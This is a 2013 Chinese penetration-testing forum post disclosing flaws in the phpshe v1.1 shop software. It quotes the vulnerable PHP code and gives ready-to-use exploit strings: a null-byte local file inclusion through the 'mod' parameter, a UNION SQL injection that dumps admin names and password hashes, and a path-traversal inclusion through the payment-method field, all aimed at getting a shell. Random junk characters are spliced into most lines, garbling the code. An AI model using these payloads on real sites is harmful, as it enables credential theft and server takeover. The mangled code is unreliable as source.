找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpshe v1.1多处SQL注入和文件包含漏洞Getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2652|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-4-19 19:01:54 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/  }2 |5 {  ]- v7 ]* w
/* Phpshe v1.1 Vulnerability$ ^$ }& i# \. Q' M
/* ========================9 t6 o5 `$ `) p  [& N
/* By: : Kn1f3
+ W- {  W( t( @5 {. }0 S$ B/* E-Mail : 681796@qq.com
  `) |2 P+ i$ b/*******************************************************/
( ~7 |, X! m5 c4 P5 M6 k/ T# M0×00 整体大概参数传输: [( f9 m2 [! J, L5 y$ E5 Q( b
. Y: e4 |3 b( ]1 ], ~

" T0 t. r0 N: ^( u6 U0 S! G3 o' y; _& ?( a% ]
//common.php+ Q8 ?. d, }4 i4 s. W# d
if (get_magic_quotes_gpc()) {6 t- l. M  R) @5 _
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
$ K& b& O* @0 z( _. }) W* P/ V!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
9 a" p* j7 F0 e# r6 m" r/ D}
9 I  P% M& n6 h- `! F% e6 S; o0 Selse {9 H3 Q: d: T& x/ r7 w. b; F
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
7 f7 ~! l" b7 l!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');8 Z6 Y. L. p* m
}; Q/ ?0 Z9 m  s
session_start();
' y( |+ Y9 S/ s* G! c- u. r/ x!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
& @7 }5 N" l. H0 C& p!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');1 P& a0 D- c. S( c% w

% z5 n, Z1 s" x6 ^, c+ @0×01 包含漏洞; r, A  t* W9 P1 G

( Q) v+ l' q) v: R- ]
4 k- y& [; S0 c( ^0 m; N5 Q//首页文件% V  e( \0 m' Y/ M9 K
<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);* }# K: ~! k5 X$ E$ T6 s. L
include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
6 F' z' _- ]# k: s  y. K3 @. S) @8 rpe_result();
. ~+ A7 [3 V: `# O( Z+ Z6 O?>% H; k6 Q$ o$ B
//common 文件 第15行开始
9 I/ z6 Y, M; `- y: X% curl路由配置2 {" B& J5 B2 o" {- X4 s7 }
$module = $mod = $act = 'index';
! T2 @. h* L7 _; Z, K% S2 j+ z$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);" `! z& b/ }- s! {1 J; F
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);' M; K4 L. b9 |# x
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);' D4 r+ I+ Z3 a9 j
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
/ g) n" `3 ?( ^8 C: l) F


' U1 \' E7 N9 G: `5 T, n8 M$ X
) w3 q5 y7 @2 C. ?' \8 K8 E 0×02 搜索注入. D+ ^- B& f9 v5 o* ]$ w

6 C6 E- i* K$ U+ T; H<code id="code2">

//product.php文件' g5 D! N5 u" W% p
case 'list':
1 W3 ~1 n1 i3 S# N! ]$category_id = intval($id);
" L3 R4 w. }2 N1 Q0 o( L* C( p$info = $db->pe_select('category', array('category_id'=>$category_id));& }) j: d# M; s
//搜索3 b' E; V/ M5 P9 W' p
$sqlwhere = " and `product_state` = 1";
! R$ F& D2 Z3 S4 d) Mpe_lead('hook/category.hook.php');
( R# i/ ~7 l$ J+ Z# c1 e3 a- S% {if ($category_id) {" _' ^6 T6 C2 Q$ T# t  w- ~
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
0 e" S4 q" {8 |& h# J3 x$ a/ F}  t! s" ^9 R2 }: M0 {
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤( T: i) e- w, w! Q- A
if ($_g_orderby) {& S6 p- M# }  N" J$ Y7 K/ q6 z
$orderby = explode('_', $_g_orderby);
) O" u, F  f* u. L3 g# m$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
2 a/ h6 h+ Y' j+ v0 m0 b}5 q$ M% B$ Z8 c
else {
, a% B4 w3 }) W$sqlwhere .= " order by `product_id` desc";3 ?3 ^# j1 M4 p/ _5 l5 a. z
}
5 _2 A& [' S# {: B$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));. j9 B- T- m; ^2 M% N! D" ^) [
//热卖排行
0 X& D+ ?, K8 M/ P2 i$product_hotlist = product_hotlist();1 f& E1 {& s! X6 x0 D4 B5 |5 N' o
//当前路径( w5 h' ^( J" `4 s7 B, }
$nowpath = category_path($category_id);
# {3 o) I1 O8 `) @6 f6 i+ q; _$seo = pe_seo($info['category_name']);
) L! N3 l& ^/ m3 \0 R% z4 x2 @include(pe_tpl('product_list.html'));
. e+ h( P2 _: }7 G6 y. D0 p//跟进selectall函数库
# z7 ^9 A7 |1 Opublic function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
; k7 b) E6 s: p. k# r/ q1 s4 M2 a{& p& H- Z9 ]3 L7 _
//处理条件语句
6 _4 j% w% k9 ^% w1 @7 U9 g$sqlwhere = $this->_dowhere($where);
9 n4 {! d# ?; J5 I1 l. Zreturn $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);2 L0 h$ h5 Z& |$ Y5 O7 _$ U
}
; K) ~/ Q3 l( f5 E% k! \//exp, T! @6 U8 Y) u" p. S9 w+ }7 @9 v
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
/ m. [8 e! Z& Y% U

</code>
8 ?! }& e& ]8 f; s' ]  t, T
% J* F4 E! {* Y3 k; e) X0×03 包含漏洞2
. ?, Q' @! h8 Q% y& b  ~- P0 M; U) W $ N  P: N2 k# K
<code id="code3">

//order.php

case 'pay':

- J2 ?. f! Q6 k8 l( V! S# l$ I$ |
$order_id = pe_dbhold($_g_id);

* h' U* I! E" i  g# z6 d1 J& V6 E
$cache_payway = cache::get('payway');

+ j7 K3 g. e/ R) D3 f1 h
foreach($cache_payway as $k => $v) {

/ t! u( u! k: {# `9 M
$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);


5 I+ q4 U7 q& D% y% C9 K( Oif ($k == 'bank') {

, V3 @6 y( Z1 ?2 r' o2 v
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

; D$ t( p+ z0 L3 F, b& ^, m
}


/ K7 q) q& \" Z- x}


0 G: T) w+ j; d6 C4 z* {+ g. w- Z" J$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));


) X% l/ c' S# T0 K% [: R, L6 G!$order['order_id'] && pe_error('订单号错误...');


* C$ z9 D8 e' m1 a- n7 dif (isset($_p_pesubmit)) {

9 q/ ^6 L! }/ V' i6 j( A5 ~+ R) x
if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

9 n8 A! U5 h" W$ l
$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

1 m) A* F) M( I
foreach ($info_list as $v) {


0 h6 G# u. h+ q8 e, i$order['order_name'] .= "{$v['product_name']};";
& S- ]8 p- m8 L% r$ l0 U) S

9 Q; ]. o6 _/ y6 B9 S& u
}


8 }7 C, a4 x, Y7 D+ s/ Q. s% yecho '正在为您连接支付网站,请稍后...';


2 I; y  ~% `& f  u; [include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

% D4 j& l0 A6 H2 g7 T% U
}//当一切准备好的时候就可以进行"鸡肋包含了"

# T. _" }; A' S' X
else {


8 z2 Z5 l3 k: rpe_error('支付错误...');

% X$ R. F4 z0 m* r8 J
}

( {8 J9 r1 Y1 S% B, m
}

" l+ K5 Q4 L9 s! Y" H
$seo = pe_seo('选择支付方式');


' t" ]9 T, Q+ f/ _, yinclude(pe_tpl('order_pay.html'));

* J* W  A" }2 w: ]2 n
break;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
7 M4 D$ `. u3 E# v* l1 c$ s7 `5 P9 C

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表